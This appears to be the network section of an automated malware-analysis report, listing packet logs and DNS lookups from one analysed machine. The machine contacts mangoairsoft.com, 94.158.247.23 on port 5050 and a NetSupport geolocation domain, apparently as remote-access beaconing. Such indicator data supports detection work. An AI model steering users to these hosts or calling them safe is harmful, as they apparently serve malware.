Aug 2, 2023 10:35:15.256645918 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.256680965 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.256839991 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.256875992 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.256947994 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.256974936 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.257008076 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.257021904 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.257052898 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.257550001 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.257572889 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.257637024 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.257659912 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.257677078 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.258765936 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.258814096 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.258867979 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.258888006 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.258908987 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.259548903 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.259571075 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.259619951 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.259638071 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.259654045 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.260162115 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.260191917 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.260243893 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.260272026 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.260287046 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.261513948 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.261548042 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.261604071 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.261624098 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.261641979 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.261662006 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.261704922 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.261723995 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.261734962 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.261760950 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.261977911 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.261997938 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.262036085 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.262049913 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.262068987 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.263402939 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.263430119 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.263499975 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.263520956 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.263545990 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.263837099 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.263885021 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.263915062 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.263931036 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.263947964 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.263948917 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.263993979 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.277208090 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.317137003 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.317192078 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.409961939 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.410015106 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.410147905 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.424747944 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.424786091 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.550571918 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.550731897 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.552578926 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.552598953 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.552995920 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.557970047 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.598817110 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.726500034 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.726547956 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.726587057 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.726735115 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.726792097 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.726814985 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.726839066 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.726850033 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.726898909 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.726937056 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.784780979 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.784826994 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.784946918 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.784984112 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.785047054 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.785088062 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.785125971 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.785268068 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.785299063 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.785343885 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.785368919 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.785388947 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.826884031 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.843529940 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.843569994 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.843713045 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.843748093 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.843831062 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.843867064 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.843972921 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.844041109 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.844077110 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.844146967 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.844163895 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.844218969 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.844315052 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.844336033 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.844410896 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.844429016 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.844608068 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.844635010 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.844722033 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.844741106 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.879997015 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.880037069 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.880280018 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.880311966 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.880419016 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.880464077 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.880525112 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.880538940 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.880611897 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.903352022 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.903397083 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.903620958 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.903660059 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.903754950 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.903796911 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.903841019 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.903922081 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.903922081 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.903939009 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.903965950 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.904009104 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.904021025 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.904093027 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.904230118 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.904251099 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.904334068 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.904347897 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.904413939 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.904573917 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.904597044 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.904681921 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.904701948 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.904778004 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.904879093 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.904896975 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.904975891 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.904994011 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.905057907 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.905144930 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.905164957 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.905273914 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.905288935 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.905353069 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.905457020 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.905474901 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.905555964 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.905570984 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.905628920 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.905738115 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.905761957 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.905847073 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.905860901 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.905924082 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.905992031 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.906013012 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.906092882 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.906116009 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.906183004 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.938843966 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.938884020 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.939007998 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.939039946 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.939095020 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.939132929 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.939182997 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.939292908 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.939311028 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.940340042 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.940380096 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.964724064 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.964770079 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.964996099 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.965014935 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.965034008 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.965073109 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.965104103 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.965136051 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.965342999 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.965364933 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.965430021 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.965449095 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.965492010 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.965683937 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.965703964 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.965760946 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.965779066 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.965797901 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.965823889 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.966023922 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.966043949 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.966095924 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.966109991 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.966140032 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.966159105 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.966331959 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.966353893 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.966402054 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.966417074 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.966440916 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.966463089 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.966670036 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.966694117 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.966737032 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.966752052 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.966774940 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.966804028 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.966994047 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.967015028 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.967063904 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.967076063 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.967108011 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.967128038 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.967318058 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.967339039 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.967394114 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.967406988 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.967430115 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.967451096 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.967649937 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.967670918 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.967719078 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.967731953 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.967760086 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.967781067 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.967926979 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.967972040 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.967998028 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.968009949 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.968039989 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.968080044 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:16.968125105 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.985949039 CEST	49695	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:16.986042023 CEST	443	49695	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:17.627727985 CEST	49696	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:17.627794981 CEST	443	49696	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:17.627901077 CEST	49696	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:17.654738903 CEST	49696	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:17.654808998 CEST	443	49696	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:17.779349089 CEST	443	49696	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:17.779565096 CEST	49696	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:17.782238007 CEST	49696	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:17.782275915 CEST	443	49696	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:17.782689095 CEST	443	49696	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:17.792351961 CEST	49696	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:17.834831953 CEST	443	49696	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:17.893944979 CEST	443	49696	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:17.894036055 CEST	443	49696	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:17.894167900 CEST	49696	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:17.912672997 CEST	49696	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:17.912728071 CEST	443	49696	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:28.010848045 CEST	49697	5050	192.168.2.4	94.158.247.23
Aug 2, 2023 10:35:28.185683966 CEST	5050	49697	94.158.247.23	192.168.2.4
Aug 2, 2023 10:35:28.185823917 CEST	49697	5050	192.168.2.4	94.158.247.23
Aug 2, 2023 10:35:28.915442944 CEST	49697	5050	192.168.2.4	94.158.247.23
Aug 2, 2023 10:35:29.090390921 CEST	5050	49697	94.158.247.23	192.168.2.4
Aug 2, 2023 10:35:29.132843971 CEST	49697	5050	192.168.2.4	94.158.247.23
Aug 2, 2023 10:35:29.838072062 CEST	49697	5050	192.168.2.4	94.158.247.23
Aug 2, 2023 10:35:30.013356924 CEST	5050	49697	94.158.247.23	192.168.2.4
Aug 2, 2023 10:35:30.053879976 CEST	49697	5050	192.168.2.4	94.158.247.23
Aug 2, 2023 10:35:30.176525116 CEST	49697	5050	192.168.2.4	94.158.247.23
Aug 2, 2023 10:35:30.414129019 CEST	5050	49697	94.158.247.23	192.168.2.4
Aug 2, 2023 10:35:32.482316017 CEST	49698	80	192.168.2.4	62.172.138.67
Aug 2, 2023 10:35:32.524353981 CEST	80	49698	62.172.138.67	192.168.2.4
Aug 2, 2023 10:35:32.524466038 CEST	49698	80	192.168.2.4	62.172.138.67
Aug 2, 2023 10:35:32.634270906 CEST	49698	80	192.168.2.4	62.172.138.67
Aug 2, 2023 10:35:32.681808949 CEST	80	49698	62.172.138.67	192.168.2.4
Aug 2, 2023 10:35:32.683012962 CEST	49698	80	192.168.2.4	62.172.138.67
Aug 2, 2023 10:36:30.317857981 CEST	49697	5050	192.168.2.4	94.158.247.23
Aug 2, 2023 10:36:30.556905985 CEST	5050	49697	94.158.247.23	192.168.2.4
Aug 2, 2023 10:37:18.944232941 CEST	49698	80	192.168.2.4	62.172.138.67
Aug 2, 2023 10:37:18.986093044 CEST	80	49698	62.172.138.67	192.168.2.4
Aug 2, 2023 10:37:18.986239910 CEST	49698	80	192.168.2.4	62.172.138.67
Aug 2, 2023 10:37:30.490075111 CEST	49697	5050	192.168.2.4	94.158.247.23
Aug 2, 2023 10:37:30.710428953 CEST	5050	49697	94.158.247.23	192.168.2.4
Aug 2, 2023 10:38:30.546225071 CEST	49697	5050	192.168.2.4	94.158.247.23
Aug 2, 2023 10:38:30.773684978 CEST	5050	49697	94.158.247.23	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 2, 2023 10:35:10.652487040 CEST	50911	53	192.168.2.4	8.8.8.8
Aug 2, 2023 10:35:10.717427015 CEST	53	50911	8.8.8.8	192.168.2.4
Aug 2, 2023 10:35:12.699897051 CEST	59683	53	192.168.2.4	8.8.8.8
Aug 2, 2023 10:35:12.749922991 CEST	53	59683	8.8.8.8	192.168.2.4
Aug 2, 2023 10:35:14.152388096 CEST	64167	53	192.168.2.4	8.8.8.8
Aug 2, 2023 10:35:14.284938097 CEST	53	64167	8.8.8.8	192.168.2.4
Aug 2, 2023 10:35:16.361244917 CEST	58565	53	192.168.2.4	8.8.8.8
Aug 2, 2023 10:35:16.381617069 CEST	53	58565	8.8.8.8	192.168.2.4
Aug 2, 2023 10:35:17.588977098 CEST	52239	53	192.168.2.4	8.8.8.8
Aug 2, 2023 10:35:17.609244108 CEST	53	52239	8.8.8.8	192.168.2.4
Aug 2, 2023 10:35:31.920286894 CEST	56807	53	192.168.2.4	8.8.8.8
Aug 2, 2023 10:35:31.954967022 CEST	53	56807	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 2, 2023 10:35:10.652487040 CEST	192.168.2.4	8.8.8.8	0xba10	Standard query (0)	magydostravel.com	A (IP address)	IN (0x0001)	false
Aug 2, 2023 10:35:12.699897051 CEST	192.168.2.4	8.8.8.8	0xf911	Standard query (0)	mangoairsoft.com	A (IP address)	IN (0x0001)	false
Aug 2, 2023 10:35:14.152388096 CEST	192.168.2.4	8.8.8.8	0x738	Standard query (0)	mangoairsoft.com	A (IP address)	IN (0x0001)	false
Aug 2, 2023 10:35:16.361244917 CEST	192.168.2.4	8.8.8.8	0x6b88	Standard query (0)	mangoairsoft.com	A (IP address)	IN (0x0001)	false
Aug 2, 2023 10:35:17.588977098 CEST	192.168.2.4	8.8.8.8	0x2d98	Standard query (0)	mangoairsoft.com	A (IP address)	IN (0x0001)	false
Aug 2, 2023 10:35:31.920286894 CEST	192.168.2.4	8.8.8.8	0x634	Standard query (0)	geo.netsupportsoftware.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 2, 2023 10:35:10.717427015 CEST	8.8.8.8	192.168.2.4	0xba10	No error (0)	magydostravel.com		185.9.147.166	A (IP address)	IN (0x0001)	false
Aug 2, 2023 10:35:12.749922991 CEST	8.8.8.8	192.168.2.4	0xf911	No error (0)	mangoairsoft.com		188.127.230.147	A (IP address)	IN (0x0001)	false
Aug 2, 2023 10:35:14.284938097 CEST	8.8.8.8	192.168.2.4	0x738	No error (0)	mangoairsoft.com		188.127.230.147	A (IP address)	IN (0x0001)	false
Aug 2, 2023 10:35:16.381617069 CEST	8.8.8.8	192.168.2.4	0x6b88	No error (0)	mangoairsoft.com		188.127.230.147	A (IP address)	IN (0x0001)	false
Aug 2, 2023 10:35:17.609244108 CEST	8.8.8.8	192.168.2.4	0x2d98	No error (0)	mangoairsoft.com		188.127.230.147	A (IP address)	IN (0x0001)	false
Aug 2, 2023 10:35:31.954967022 CEST	8.8.8.8	192.168.2.4	0x634	No error (0)	geo.netsupportsoftware.com	geography.netsupportsoftware.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 2, 2023 10:35:31.954967022 CEST	8.8.8.8	192.168.2.4	0x634	No error (0)	geography.netsupportsoftware.com		62.172.138.67	A (IP address)	IN (0x0001)	false
Aug 2, 2023 10:35:31.954967022 CEST	8.8.8.8	192.168.2.4	0x634	No error (0)	geography.netsupportsoftware.com		62.172.138.8	A (IP address)	IN (0x0001)	false
